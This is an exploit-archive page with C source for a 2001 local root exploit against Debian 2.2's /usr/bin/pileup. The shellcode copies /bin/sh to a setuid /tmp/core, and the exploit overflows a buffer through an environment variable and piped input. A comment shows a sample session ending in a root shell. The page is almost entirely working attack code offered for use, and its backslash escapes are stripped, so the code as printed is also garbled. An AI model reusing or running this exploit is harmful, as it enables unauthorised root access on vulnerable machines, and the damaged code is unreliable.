[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Debian 2.2 /usr/bin/pileup Local Root Exploit
# Published : 2001-07-13
# Author : Charles Stevenson
# Previous Title : FreeBSD TOP Format String Vulnerability
# Next Title : IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit
/* pileup-xpl.c - local root exploit
*
* by core
*
* Friday the 13th, July 2001
*
* based almost entirely on code by Cody Tubbs (loophole of hhp)
*
* $ ./pileup-xpl
* pileup-xpl by core 2001 - beep beep root!
* usage: ./pileup-xpl [offset] [align(0..3)]
* Ret-addr: 0xbfffe09c, offset: 0, align: 0.
* How many voices (1 to 9)
* Starting speed (wpm)
* (C)ompetion mode or (P)ractice mode
* Enter '0' to abort the session! GL..
*
* TX RX TX RX
* -- -- -- --
*
* Accuracy: 0/6. Max speed: 13
* Score: 0
* Score: core wins!
* core-2.03# id
* uid=1000(core) gid=1000(core) euid=0(root) groups=1000(core)
* core-2.03# exit
* $
*
* greetz b10z, hhp, loophole
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define SH_IS_BASH 1 /* if /bin/sh -> /bin/bash */
#define PATH "/usr/bin/pileup" // Change to direct path if needed.
#define OFFSET 0 // Worked for me.
#define ALIGN 0 // Don't change.
#define NOP 0x90 // x86 No OPeration.
#define DBUF 20 // 16+4(ebp)+4(eip)=24.
#define DAT "calls.dat" // Required for exploitation.
static char shellcode[]=
"x31xc0" /* set[gu]id(0);/bin/cp /bin/sh /tmp/core;chmod 4555 /tmp/core */
"x31xdbxb0x17xcdx80x66x31xc0x66x31xdbxb0x2excdx80"
"xebx5ex5fx31xc0x88x47x07x88x47x0fx88x47x19x89x7f"
"x1ax8dx77x08x89x77x1ex31xf6x8dx77x10x89x77x22x89"
"x47x26x89xfbx8dx4fx1ax8dx57x26x31xc0xb0x02xcdx80"
"x31xf6x39xc6x75x06xb0x0bxcdx80xebx1dx31xd2x31xc0"
"x31xdbx4bx8dx4fx26xb0x07xcdx80x31xc0x8dx5fx10x31"
"xc9x66xb9x6dx09xb0x0fxcdx80x31xc0x40x31xdbxcdx80"
"xe8x9dxffxffxff/bin/cp8/bin/sh8/tmp/core";
long get_sp(void) {
__asm__("movl %esp,%eax");
}
void usage(char *name){
fprintf(stderr, "pileup-xpl by core 2001 - beep beep root!n");
fprintf(stderr, "usage: %s [offset] [align(0..3)]n", name);
}
int main(int argc, char **argv){
char eipeip[DBUF], buffer[7192];
char go[DBUF + 22];
FILE *calls;
int i, offset, align;
long address;
usage(argv[0]);
/* Remove the config and write OWNED! */
unlink(DAT);
calls = fopen(DAT, "w");
fprintf(calls, "OWNEDn");
fclose(calls);
/* Do command line */
if (argc > 1) {
offset = atoi(argv[1]);
}
else {
offset = OFFSET;
}
if (argc > 2) {
align = atoi(argv[2]);
}
else {
align = ALIGN;
}
address = get_sp() - offset;
if (align > 0) {
for(i=0; i < align; i++) {
eipeip[i] = 0x69;
}
}
for (i=align; i < DBUF; i+=4) {
*(long *)&eipeip[i] = address;
}
for (i=0; i < (7192 - strlen(shellcode) - strlen(eipeip)); i++) {
buffer[i] = NOP;
}
/* setup the environment */
memcpy(buffer + i, shellcode, strlen(shellcode));
memcpy(buffer, "UPEX=", 5);
putenv(buffer);
fprintf(stderr, "Ret-addr: %#x, offset: %d, align: %d.n", address,
offset, align);
sprintf(go, "(printf '1n0nCn%sn0n')|%s", eipeip, PATH); //netcat style.
system(go);
fprintf(stderr, "Score: core wins!n");
#ifdef SH_IS_BASH
system("/tmp/core -p");
#else
system("/tmp/core");
#endif
return 0;
}
// www.Syue.com [2001-07-13]